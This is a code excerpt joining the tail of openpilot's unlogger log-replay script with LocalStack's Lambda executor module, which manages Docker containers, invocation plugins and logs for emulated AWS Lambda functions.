i, sof, eof = extra[0]
stream = VisionStreamType.VISION_STREAM_RGB_BACK if typ == VIPC_RGB else VisionStreamType.VISION_STREAM_YUV_BACK
vipc_server.send(stream, msg_bytes, i, sof, eof)
else:
send_funcs[typ](msg_bytes)
except MultiplePublishersError:
del send_funcs[typ]
def timestamp_to_s(tss):
return time.mktime(datetime.strptime(tss, '%Y-%m-%d--%H-%M-%S').timetuple())
def absolute_time_str(s, start_time):
try:
# first try if it's a float
return float(s)
except ValueError:
# now see if it's a timestamp
return timestamp_to_s(s) - start_time
def _get_address_mapping(args):
if args.min is not None:
services_to_mock = [
'deviceState', 'can', 'pandaState', 'sensorEvents', 'gpsNMEA', 'roadCameraState', 'roadEncodeIdx',
'modelV2', 'liveLocation',
]
elif args.enabled is not None:
services_to_mock = args.enabled
else:
services_to_mock = service_list.keys()
address_mapping = {service_name: service_name for service_name in services_to_mock}
address_mapping.update(dict(args.address_mapping))
for k in args.disabled:
address_mapping.pop(k, None)
non_services = set(address_mapping) - set(service_list)
if non_services:
print("WARNING: Unknown services {}".format(list(non_services)))
return address_mapping
def keyboard_controller_thread(q, route_start_time):
print("keyboard waiting for input")
kb = KBHit()
while 1:
c = kb.getch()
if c == 'm': # Move forward by 1m
q.send_pyobj(SeekRelativeTime(60))
elif c == 'M': # Move backward by 1m
q.send_pyobj(SeekRelativeTime(-60))
elif c == 's': # Move forward by 10s
q.send_pyobj(SeekRelativeTime(10))
elif c == 'S': # Move backward by 10s
q.send_pyobj(SeekRelativeTime(-10))
elif c == 'G': # Move backward by 10s
q.send_pyobj(SeekAbsoluteTime(0.))
elif c == "\x20": # Space bar.
q.send_pyobj(TogglePause())
elif c == "\n":
try:
seek_time_input = input('time: ')
seek_time = absolute_time_str(seek_time_input, route_start_time)
# If less than 60, assume segment number
if seek_time < 60:
seek_time *= 60
q.send_pyobj(SeekAbsoluteTime(seek_time))
except Exception as e:
print("Time not understood: {}".format(e))
def get_arg_parser():
parser = argparse.ArgumentParser(
description="Mock openpilot components by publishing logged messages.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("route_name", type=(lambda x: x.replace("#", "|")), nargs="?",
help="The route whose messages will be published.")
parser.add_argument("data_dir", nargs='?', default=os.getenv('UNLOGGER_DATA_DIR'),
help="Path to directory in which log and camera files are located.")
parser.add_argument("--no-loop", action="store_true", help="Stop at the end of the replay.")
def key_value_pair(x):
return x.split("=")
parser.add_argument("address_mapping", nargs="*", type=key_value_pair,
help="Pairs <service>=<zmq_addr> to publish <service> on <zmq_addr>.")
def comma_list(x):
return x.split(",")
to_mock_group = parser.add_mutually_exclusive_group()
to_mock_group.add_argument("--min", action="store_true", default=os.getenv("MIN"))
to_mock_group.add_argument("--enabled", default=os.getenv("ENABLED"), type=comma_list)
parser.add_argument("--disabled", type=comma_list, default=os.getenv("DISABLED") or ())
parser.add_argument(
"--tl", dest="publish_time_length", type=float, default=None,
help="Length of interval in event time for which messages should be published.")
parser.add_argument(
"--no-realtime", dest="realtime", action="store_false", default=True,
help="Publish messages as quickly as possible instead of realtime.")
parser.add_argument(
"--no-interactive", dest="interactive", action="store_false", default=True,
help="Disable interactivity.")
parser.add_argument(
"--bind-early", action="store_true", default=False,
help="Bind early to avoid dropping messages.")
parser.add_argument(
"--no-visionipc", action="store_true", default=False,
help="Do not output video over visionipc")
parser.add_argument(
"--start-time", type=float, default=0.,
help="Seek to this absolute time (in seconds) upon starting playback.")
return parser
def main(argv):
args = get_arg_parser().parse_args(sys.argv[1:])
command_address = "ipc:///tmp/{}".format(uuid4())
forward_commands_address = "ipc:///tmp/{}".format(uuid4())
data_address = "ipc:///tmp/{}".format(uuid4())
address_mapping = _get_address_mapping(args)
command_sock = zmq.Context.instance().socket(zmq.PUSH)
command_sock.connect(command_address)
if args.route_name is not None:
route_name_split = args.route_name.split("|")
if len(route_name_split) > 1:
route_start_time = timestamp_to_s(route_name_split[1])
else:
route_start_time = 0
command_sock.send_pyobj(
SetRoute(args.route_name, args.start_time, args.data_dir))
else:
print("waiting for external command...")
route_start_time = 0
subprocesses = {}
try:
subprocesses["data"] = multiprocessing.Process(
target=UnloggerWorker().run,
args=(forward_commands_address, data_address, address_mapping.copy()))
subprocesses["control"] = multiprocessing.Process(
target=unlogger_thread,
args=(command_address, forward_commands_address, data_address, args.realtime,
_get_address_mapping(args), args.publish_time_length, args.bind_early, args.no_loop, args.no_visionipc))
subprocesses["data"].start()
subprocesses["control"].start()
# Exit if any of the children die.
def exit_if_children_dead(*_):
for _, p in subprocesses.items():
if not p.is_alive():
[p.terminate() for p in subprocesses.values()]
exit()
signal.signal(signal.SIGCHLD, signal.SIG_IGN)
signal.signal(signal.SIGCHLD, exit_if_children_dead)
if args.interactive:
keyboard_controller_thread(command_sock, route_start_time)
else:
# Wait forever for children.
while True:
time.sleep(10000.)
finally:
for p in subprocesses.values():
if p.is_alive():
try:
p.join(3.)
except multiprocessing.TimeoutError:
p.terminate()
continue
return 0
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
|
lambda_executors.py | import base64
import contextlib
import glob
import json
import logging
import os
import re
import subprocess
import sys
import threading
import time
import traceback
from multiprocessing import Process, Queue
from typing import Any, Dict, List, Optional, Tuple, Union
from localstack import config
from localstack.services.awslambda.lambda_utils import (
LAMBDA_RUNTIME_JAVA8,
LAMBDA_RUNTIME_JAVA8_AL2,
LAMBDA_RUNTIME_JAVA11,
LAMBDA_RUNTIME_PROVIDED,
)
from localstack.services.install import GO_LAMBDA_RUNTIME, INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils import bootstrap
from localstack.utils.aws import aws_stack
from localstack.utils.aws.aws_models import LambdaFunction
from localstack.utils.aws.dead_letter_queue import (
lambda_error_to_dead_letter_queue,
sqs_error_to_dead_letter_queue,
)
from localstack.utils.aws.lambda_destinations import lambda_result_to_destination
from localstack.utils.cloudwatch.cloudwatch_util import cloudwatched, store_cloudwatch_logs
from localstack.utils.common import (
TMP_FILES,
CaptureOutput,
get_all_subclasses,
get_free_tcp_port,
in_docker,
json_safe,
last_index_of,
long_uid,
md5,
now,
run,
save_file,
short_uid,
to_bytes,
to_str,
)
from localstack.utils.docker import DOCKER_CLIENT, ContainerException, PortMappings
from localstack.utils.run import FuncThread
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = "cloud.localstack.LambdaExecutor"
LAMBDA_HANDLER_ENV_VAR_NAME = "_HANDLER"
EVENT_FILE_PATTERN = "%s/lambda.event.*.json" % config.TMP_FOLDER
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
MAX_ENV_ARGS_LENGTH = 20000
INTERNAL_LOG_PREFIX = "ls-daemon: "
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
# SQS event source name
EVENT_SOURCE_SQS = "aws:sqs"
# IP address of main Docker container (lazily initialized)
DOCKER_MAIN_CONTAINER_IP = None
# maps lambda arns to concurrency locks
LAMBDA_CONCURRENCY_LOCK = {}
# CWD folder of handler code in Lambda containers
DOCKER_TASK_FOLDER = "/var/task"
class InvocationException(Exception):
def __init__(self, message, log_output, result=None):
super(InvocationException, self).__init__(message)
self.log_output = log_output
self.result = result
class AdditionalInvocationOptions:
# Maps file keys to file paths. The keys can be used as placeholders in the env. variables
# and command args to reference files - e.g., given `files_to_add` as {"f1": "/local/path"} and
# `env_updates` as {"MYENV": "{f1}"}, the Lambda handler will receive an environment variable
# `MYENV=/lambda/path` and the file /lambda/path will be accessible to the Lambda handler
# (either locally, or inside Docker).
files_to_add: Dict[str, str]
# Environment variable updates to apply for the invocation
env_updates: Dict[str, str]
# Updated command to use for starting the Lambda process (or None)
updated_command: Optional[str]
def __init__(self, files_to_add=None, env_updates=None, updated_command=None):
self.files_to_add = files_to_add or {}
self.env_updates = env_updates or {}
self.updated_command = updated_command
class InvocationResult:
def __init__(self, result, log_output=""):
if isinstance(result, InvocationResult):
raise Exception("Unexpected invocation result type: %s" % result)
self.result = result
self.log_output = log_output or ""
class InvocationContext:
lambda_function: LambdaFunction
event: Dict[str, Any]
lambda_command: str # TODO: change to List[str] ?
docker_flags: str # TODO: change to List[str] ?
environment: Dict[str, str]
context: Dict[str, Any]
def __init__(
self,
lambda_function: LambdaFunction,
event: Dict,
environment=None,
context=None,
lambda_command=None,
docker_flags=None,
):
self.lambda_function = lambda_function
self.event = event
self.environment = {} if environment is None else environment
self.context = {} if context is None else context
self.lambda_command = lambda_command
self.docker_flags = docker_flags
class LambdaExecutorPlugin:
"""Plugin abstraction that allows to hook in additional functionality into the Lambda executors."""
INSTANCES: List["LambdaExecutorPlugin"] = []
def initialize(self):
"""Called once, for any active plugin to run initialization logic (e.g., downloading dependencies).
Uses lazy initialization - i.e., runs only after the first should_apply() call returns True"""
pass
def should_apply(self, context: InvocationContext) -> bool:
"""Whether the plugin logic should get applied for the given Lambda invocation context."""
return False
def prepare_invocation(
self, context: InvocationContext
) -> Optional[AdditionalInvocationOptions]:
"""Return additional invocation options for given Lambda invocation context."""
return None
def process_result(
self, context: InvocationContext, result: InvocationResult
) -> InvocationResult:
"""Optionally modify the result returned from the given Lambda invocation."""
return result
def init_function_configuration(self, lambda_function: LambdaFunction):
"""Initialize the configuration of the given function upon creation or function update."""
pass
def init_function_code(self, lambda_function: LambdaFunction):
"""Initialize the code of the given function upon creation or function update."""
pass
@classmethod
def get_plugins(cls) -> List["LambdaExecutorPlugin"]:
if not cls.INSTANCES:
classes = get_all_subclasses(LambdaExecutorPlugin)
cls.INSTANCES = [clazz() for clazz in classes]
return cls.INSTANCES
def get_from_event(event: Dict, key: str):
"""Retrieve a field with the given key from the list of Records within 'event'."""
try:
return event["Records"][0][key]
except KeyError:
return None
def is_java_lambda(lambda_details):
runtime = getattr(lambda_details, "runtime", lambda_details)
return runtime in [LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA8_AL2, LAMBDA_RUNTIME_JAVA11]
def is_nodejs_runtime(lambda_details):
runtime = getattr(lambda_details, "runtime", lambda_details) or ""
return runtime.startswith("nodejs")
def _store_logs(func_details, log_output, invocation_time=None, container_id=None):
log_group_name = "/aws/lambda/%s" % func_details.name()
container_id = container_id or short_uid()
invocation_time = invocation_time or int(time.time() * 1000)
invocation_time_secs = int(invocation_time / 1000)
time_str = time.strftime("%Y/%m/%d", time.gmtime(invocation_time_secs))
log_stream_name = "%s/[LATEST]%s" % (time_str, container_id)
return store_cloudwatch_logs(log_group_name, log_stream_name, log_output, invocation_time)
def get_main_endpoint_from_container():
global DOCKER_MAIN_CONTAINER_IP
if not config.HOSTNAME_FROM_LAMBDA and DOCKER_MAIN_CONTAINER_IP is None:
DOCKER_MAIN_CONTAINER_IP = False
try:
if in_docker():
DOCKER_MAIN_CONTAINER_IP = bootstrap.get_main_container_ip()
LOG.info("Determined main container target IP: %s" % DOCKER_MAIN_CONTAINER_IP)
except Exception as e:
container_name = bootstrap.get_main_container_name()
LOG.info(
'Unable to get IP address of main Docker container "%s": %s' % (container_name, e)
)
# return (1) predefined endpoint host, or (2) main container IP, or (3) Docker host (e.g., bridge IP)
return (
config.HOSTNAME_FROM_LAMBDA or DOCKER_MAIN_CONTAINER_IP or config.DOCKER_HOST_FROM_CONTAINER
)
def rm_docker_container(container_name_or_id, check_existence=False, safe=False):
# TODO: remove method / move to docker module
if not container_name_or_id:
return
if check_existence and container_name_or_id not in DOCKER_CLIENT.get_running_container_names():
# TODO: check names as well as container IDs!
return
try:
DOCKER_CLIENT.remove_container(container_name_or_id)
except Exception:
if not safe:
raise
class LambdaAsyncLocks:
locks: Dict[str, Union[threading.Semaphore, threading.Lock]]
creation_lock: threading.Lock
def __init__(self):
self.locks = {}
self.creation_lock = threading.Lock()
def assure_lock_present(
self, key: str, lock: Union[threading.Semaphore, threading.Lock]
) -> Union[threading.Semaphore, threading.Lock]:
with self.creation_lock:
return self.locks.setdefault(key, lock)
LAMBDA_ASYNC_LOCKS = LambdaAsyncLocks()
class LambdaExecutor(object):
"""Base class for Lambda executors. Subclasses must overwrite the _execute method"""
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def _prepare_environment(self, func_details):
# setup environment pre-defined variables for docker environment
result = func_details.envvars.copy()
# injecting aws credentials into docker environment if not provided
aws_stack.inject_test_credentials_into_env(result)
# injecting the region into the docker environment
aws_stack.inject_region_into_env(result, func_details.region())
return result
def execute(
self,
func_arn,
func_details,
event,
context=None,
version=None,
asynchronous=False,
callback=None,
lock_discriminator: str = None,
):
def do_execute(*args):
@cloudwatched("lambda")
def _run(func_arn=None):
with contextlib.ExitStack() as stack:
if lock_discriminator:
stack.enter_context(LAMBDA_ASYNC_LOCKS.locks[lock_discriminator])
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
try:
result = self._execute(func_arn, func_details, event, context, version)
except Exception as e:
raised_error = e
if asynchronous:
if get_from_event(event, "eventSource") == EVENT_SOURCE_SQS:
sqs_queue_arn = get_from_event(event, "eventSourceARN")
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
dlq_sent = sqs_error_to_dead_letter_queue(
sqs_queue_arn, event, e
)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(func_details, event, e)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(
result, func_arn, event, error=raised_error, dlq_sent=dlq_sent
)
lambda_result_to_destination(
func_details, event, result, asynchronous, raised_error
)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug(
"Lambda executed in Event (asynchronous) mode, no response will be returned to caller"
)
FuncThread(do_execute).start()
return InvocationResult(None, log_output="Lambda executed asynchronously.")
return do_execute()
def _execute(self, func_arn, func_details, event, context=None, version=None):
"""This method must be overwritten by subclasses."""
raise NotImplementedError
def startup(self):
"""Called once during startup - can be used, e.g., to prepare Lambda Docker environment"""
pass
def cleanup(self, arn=None):
"""Called once during startup - can be used, e.g., to clean up left-over Docker containers"""
pass
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
"""Make the given file available to the Lambda process (e.g., by copying into the container) for the
given invocation context; Returns the path to the file that will be available to the Lambda handler."""
raise NotImplementedError
def apply_plugin_patches(self, inv_context: InvocationContext):
"""Loop through the list of plugins, and apply their patches to the invocation context (if applicable)"""
for plugin in LambdaExecutorPlugin.get_plugins():
if not plugin.should_apply(inv_context):
continue
# initialize, if not done yet
if not hasattr(plugin, "_initialized"):
LOG.debug("Initializing Lambda executor plugin %s", plugin.__class__)
plugin.initialize()
plugin._initialized = True
# invoke plugin to prepare invocation
inv_options = plugin.prepare_invocation(inv_context)
if not inv_options:
continue
# copy files
file_keys_map = {}
for key, file_path in inv_options.files_to_add.items():
file_in_container = self.provide_file_to_lambda(file_path, inv_context)
file_keys_map[key] = file_in_container
# replace placeholders like "{<fileKey>}" with corresponding file path
for key, file_path in file_keys_map.items():
for env_key, env_value in inv_options.env_updates.items():
inv_options.env_updates[env_key] = str(env_value).replace(
"{%s}" % key, file_path
)
if inv_options.updated_command:
inv_options.updated_command = inv_options.updated_command.replace(
"{%s}" % key, file_path
)
inv_context.lambda_command = inv_options.updated_command
# update environment
inv_context.environment.update(inv_options.env_updates)
def process_result_via_plugins(
self, inv_context: InvocationContext, invocation_result: InvocationResult
) -> InvocationResult:
"""Loop through the list of plugins, and apply their post-processing logic to the Lambda invocation result."""
for plugin in LambdaExecutorPlugin.get_plugins():
if not plugin.should_apply(inv_context):
continue
invocation_result = plugin.process_result(inv_context, invocation_result)
return invocation_result
class ContainerInfo:
"""Contains basic information about a docker container."""
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
"""Abstract executor class for executing Lambda functions in Docker containers"""
def execute_in_container(
self, func_details, env_vars, command, docker_flags=None, stdin=None, background=False
) -> Tuple[bytes, bytes]:
raise NotImplementedError
def run_lambda_executor(self, event=None, func_details=None, env_vars=None, command=None):
env_vars = dict(env_vars or {})
runtime = func_details.runtime or ""
stdin_str = None
event_body = event if event is not None else env_vars.get("AWS_LAMBDA_EVENT_BODY")
event_body = json.dumps(event_body) if isinstance(event_body, dict) else event_body
event_body = event_body or ""
is_large_event = len(event_body) > MAX_ENV_ARGS_LENGTH
is_provided = runtime.startswith(LAMBDA_RUNTIME_PROVIDED)
if (
not is_large_event
and func_details
and is_provided
and env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1"
):
# Note: certain "provided" runtimes (e.g., Rust programs) can block if we pass in
# the event payload via stdin, hence we rewrite the command to "echo ... | ..." below
env_updates = {
"AWS_LAMBDA_EVENT_BODY": to_str(
event_body
), # Note: seems to be needed for provided runtimes!
"DOCKER_LAMBDA_USE_STDIN": "1",
}
env_vars.update(env_updates)
# Note: $AWS_LAMBDA_COGNITO_IDENTITY='{}' causes Rust Lambdas to hang
env_vars.pop("AWS_LAMBDA_COGNITO_IDENTITY", None)
if is_large_event:
# in case of very large event payloads, we need to pass them via stdin
LOG.debug(
"Received large Lambda event payload (length %s) - passing via stdin"
% len(event_body)
)
env_vars["DOCKER_LAMBDA_USE_STDIN"] = "1"
if env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1":
stdin_str = event_body
if not is_provided:
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
elif "AWS_LAMBDA_EVENT_BODY" not in env_vars:
env_vars["AWS_LAMBDA_EVENT_BODY"] = to_str(event_body)
# apply plugin patches
inv_context = InvocationContext(func_details, event, environment=env_vars)
self.apply_plugin_patches(inv_context)
docker_flags = config.LAMBDA_DOCKER_FLAGS or ""
if inv_context.docker_flags:
docker_flags = f"{docker_flags} {inv_context.docker_flags}"
event_stdin_bytes = stdin_str and to_bytes(stdin_str)
error = None
try:
result, log_output = self.execute_in_container(
func_details, env_vars, command, docker_flags=docker_flags, stdin=event_stdin_bytes
)
except ContainerException as e:
result = e.stdout or ""
log_output = e.stderr or ""
error = e
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
log_formatted = log_output.strip().replace("\n", "\n> ")
func_arn = func_details and func_details.arn()
LOG.debug(
"Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
)
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if error:
raise InvocationException(
"Lambda process returned with error. Result: %s. Output:\n%s"
% (result, log_output),
log_output,
result,
) from error
# create result
invocation_result = InvocationResult(result, log_output=log_output)
# run plugins post-processing logic
invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
return invocation_result
def prepare_event(self, environment: Dict, event_body: str) -> bytes:
"""Return the event as a stdin string."""
# amend the environment variables for execution
environment["AWS_LAMBDA_EVENT_BODY"] = event_body
return event_body.encode()
def _execute(
self, func_arn: str, func_details: LambdaFunction, event: Dict, context=None, version=None
):
runtime = func_details.runtime
handler = func_details.handler
environment = self._prepare_environment(func_details)
# configure USE_SSL in environment
if config.USE_SSL:
environment["USE_SSL"] = "1"
# prepare event body
if not event:
LOG.info('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(json_safe(event))
event_bytes_for_stdin = self.prepare_event(environment, event_body)
Util.inject_endpoints_into_env(environment)
environment["EDGE_PORT"] = str(config.EDGE_PORT)
environment[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
if os.environ.get("HTTP_PROXY"):
environment["HTTP_PROXY"] = os.environ["HTTP_PROXY"]
if func_details.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(func_details.timeout)
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_COGNITO_IDENTITY"] = json.dumps(context.cognito_identity or {})
if context.client_context is not None:
environment["AWS_LAMBDA_CLIENT_CONTEXT"] = json.dumps(
to_str(base64.b64decode(to_bytes(context.client_context)))
)
# pass JVM options to the Lambda environment, if configured
if config.LAMBDA_JAVA_OPTS and is_java_lambda(runtime):
if environment.get("JAVA_TOOL_OPTIONS"):
LOG.info(
"Skip setting LAMBDA_JAVA_OPTS as JAVA_TOOL_OPTIONS already defined in Lambda env vars"
)
else:
LOG.debug(
"Passing JVM options to container environment: JAVA_TOOL_OPTIONS=%s"
% config.LAMBDA_JAVA_OPTS
)
environment["JAVA_TOOL_OPTIONS"] = config.LAMBDA_JAVA_OPTS
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment["NODE_TLS_REJECT_UNAUTHORIZED"] = "0"
# run Lambda executor and fetch invocation result
LOG.info("Running lambda: %s" % func_details.arn())
result = self.run_lambda_executor(
event=event_bytes_for_stdin, env_vars=environment, func_details=func_details
)
return result
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
if config.LAMBDA_REMOTE_DOCKER:
LOG.info("TODO: copy file into container for LAMBDA_REMOTE_DOCKER=1 - %s", local_file)
return local_file
mountable_file = Util.get_host_path_for_path_in_docker(local_file)
_, extension = os.path.splitext(local_file)
target_file_name = f"{md5(local_file)}{extension}"
target_path = f"/tmp/{target_file_name}"
inv_context.docker_flags = inv_context.docker_flags or ""
inv_context.docker_flags += f"-v {mountable_file}:{target_path}"
return target_path
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
"""Executor class for executing Lambda functions in re-usable Docker containers"""
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def execute_in_container(
self, func_details, env_vars, command, docker_flags=None, stdin=None, background=False
) -> Tuple[bytes, bytes]:
func_arn = func_details.arn()
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars["_LAMBDA_SERVER_PORT"] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug(
'Priming docker container with runtime "%s" and arn "%s".',
runtime,
func_arn,
)
container_info = self.prime_docker_container(
func_details, dict(env_vars), lambda_cwd, docker_flags
)
if not command and handler:
command = container_info.entry_point.split()
command.append(handler)
# determine files to be copied into the container
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
DOCKER_CLIENT.copy_into_container(
container_info.name, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER
)
return DOCKER_CLIENT.exec_in_container(
container_name_or_id=container_info.name,
command=command,
interactive=True,
env_vars=env_vars,
stdin=stdin,
)
def _execute(self, func_arn, *args, **kwargs):
if not LAMBDA_CONCURRENCY_LOCK.get(func_arn):
concurrency_lock = threading.RLock()
LAMBDA_CONCURRENCY_LOCK[func_arn] = concurrency_lock
with LAMBDA_CONCURRENCY_LOCK[func_arn]:
return super(LambdaExecutorReuseContainers, self)._execute(func_arn, *args, **kwargs)
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(self, func_details, env_vars, lambda_cwd, docker_flags=None):
"""
Prepares a persistent docker container for a specific function.
:param func_details: The Details of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
func_arn = func_details.arn()
container_name = self.get_container_name(func_arn)
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming Docker container (status "%s"): %s' % (status, container_name))
docker_image = Util.docker_image_for_lambda(func_details)
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
# get container startup command and run it
LOG.debug("Creating container: %s" % container_name)
self.create_container(func_details, env_vars, lambda_cwd, docker_flags)
if config.LAMBDA_REMOTE_DOCKER:
LOG.debug(
'Copying files to container "%s" from "%s".' % (container_name, lambda_cwd)
)
DOCKER_CLIENT.copy_into_container(
container_name, "%s/." % lambda_cwd, DOCKER_TASK_FOLDER
)
LOG.debug("Starting docker-reuse Lambda container: %s", container_name)
DOCKER_CLIENT.start_container(container_name)
# give the container some time to start up
time.sleep(1)
container_network = self.get_docker_container_network(func_arn)
entry_point = DOCKER_CLIENT.get_image_entrypoint(docker_image)
LOG.debug(
'Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network)
)
return ContainerInfo(container_name, entry_point)
def create_container(self, func_details, env_vars, lambda_cwd, docker_flags=None):
docker_image = Util.docker_image_for_lambda(func_details)
container_name = self.get_container_name(func_details.arn())
# make sure we set LOCALSTACK_HOSTNAME
Util.inject_endpoints_into_env(env_vars)
# make sure AWS_LAMBDA_EVENT_BODY is not set (otherwise causes issues with "docker exec ..." above)
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
network = config.LAMBDA_DOCKER_NETWORK
additional_flags = docker_flags
dns = config.LAMBDA_DOCKER_DNS
mount_volumes = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if ":" in lambda_cwd and "\\" in lambda_cwd:
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volumes = [(lambda_cwd_on_host, DOCKER_TASK_FOLDER)] if mount_volumes else None
if os.environ.get("HOSTNAME"):
env_vars["HOSTNAME"] = os.environ.get("HOSTNAME")
env_vars["EDGE_PORT"] = config.EDGE_PORT
LOG.debug(
"Creating docker-reuse Lambda container %s from image %s", container_name, docker_image
)
return DOCKER_CLIENT.create_container(
image_name=docker_image,
remove=True,
interactive=True,
name=container_name,
entrypoint="/bin/bash",
network=network,
env_vars=env_vars,
dns=dns,
mount_volumes=mount_volumes,
additional_flags=additional_flags,
)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug("Stopping container: %s" % container_name)
DOCKER_CLIENT.stop_container(container_name)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug("Removing container: %s" % container_name)
rm_docker_container(container_name, safe=True)
# clean up function invoke times, as some init logic depends on this
self.function_invoke_times.pop(func_arn, None)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A String[] localstack docker container names for each function.
"""
with self.docker_container_lock:
LOG.debug("Getting all lambda containers names.")
list_result = DOCKER_CLIENT.list_containers(filter="name=localstack_lambda_*")
container_names = list(map(lambda container: container["name"], list_result))
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug("Removing %d containers." % len(container_names))
for container_name in container_names:
DOCKER_CLIENT.remove_container(container_name)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
container_status = DOCKER_CLIENT.get_container_status(container_name)
return container_status.value
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ""
# Get the container name.
container_name = self.get_container_name(func_arn)
container_network = DOCKER_CLIENT.get_network(container_name)
return container_network
def idle_container_destroyer(self):
"""
Iterates though all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.debug("Checking if there are idle containers ...")
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
Starts a repeating timer that triggers start_idle_container_destroyer_interval every 60 seconds.
Thus checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
